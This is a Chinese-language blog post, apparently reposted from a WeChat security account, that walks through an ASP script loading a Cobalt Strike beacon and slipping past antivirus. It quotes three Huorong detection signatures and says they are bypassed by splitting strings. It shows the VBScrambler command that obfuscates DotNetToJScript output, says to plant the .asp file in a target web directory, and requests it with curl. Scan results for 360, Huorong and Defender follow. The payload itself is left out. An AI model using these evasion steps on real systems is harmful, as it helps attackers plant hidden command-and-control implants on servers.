0x00 前言
0x01 火绒测试
物理机装的只有火绒,以它为例简单测试下,其他杀软大家自己测试,因为之前有测试过这类脚本,所以知道有以下两个特征HackTool/Meterpreter.a,如下图所示。
-
AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy
-
AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph
上边两个特征可用" & "这种简单混淆绕过,然后再次扫描又被检测为Trojan/JS.Starter.e,查杀的fmt.Deserialize_2方法,这是第三个特征...,如下图所示。
Set d = fmt.Deserialize_2(Base64ToStream(s))
0x02 脚本免杀
vbs obfuscated ,Recently updated排序找到一个5天前更新的VBScrambler,同类项目也可以去测试下,如下图所示。https://github.com/bobby-tablez/VBScramblerVBScrambler是一个基于Python写的VBScript代码混淆器,可将VBScript脚本文件或单行代码进行混淆,对于该工具的详细介绍、工作原理、可选参数以及使用方法可以去项目地址详细了解。
这里我们将DotNetToJScript输出的VBScript脚本文件代码修改为ASP可用代码,然后再用VBScrambler工具来进行混淆并输出保存到一个新的文件cstest.vbs,如下图所示。
python3 VBScrambler.py -s 5 -f cs.vbs -o cstest.vbs
打开cstest.vbs文件在顶/尾部加上ASP标识<% %>,然后再将该文件扩展名修改为.asp,以下为经过混淆后的ASP代码,无明显特征(SNIP省略了部分代码),如下图所示。
这里和之前操作一样,将混淆后的ASP脚本上传到目标Web目录下,使用任意一款浏览器访问该脚本文件即可上线CobaltStrike,因为我是本地测试,所以直接用的curl,如下图所示。
curl http://192.168.1.110/cstest.asp
0x03 免杀效果
这里我也只是简单的测试了下国内常用的360、火绒和Defender,其他更多AV/EDR/WAF等安全防护的免杀效果大家自行测试,如下图所示。
火绒安全软件:
360安全卫士(核晶):
Windows Defender:
静态扫描过了,但在访问执行时仍会被AMSI检测到并拦截……!
原文始发于微信公众号(蚁景网安):简单制作免杀上线CS的ASP脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论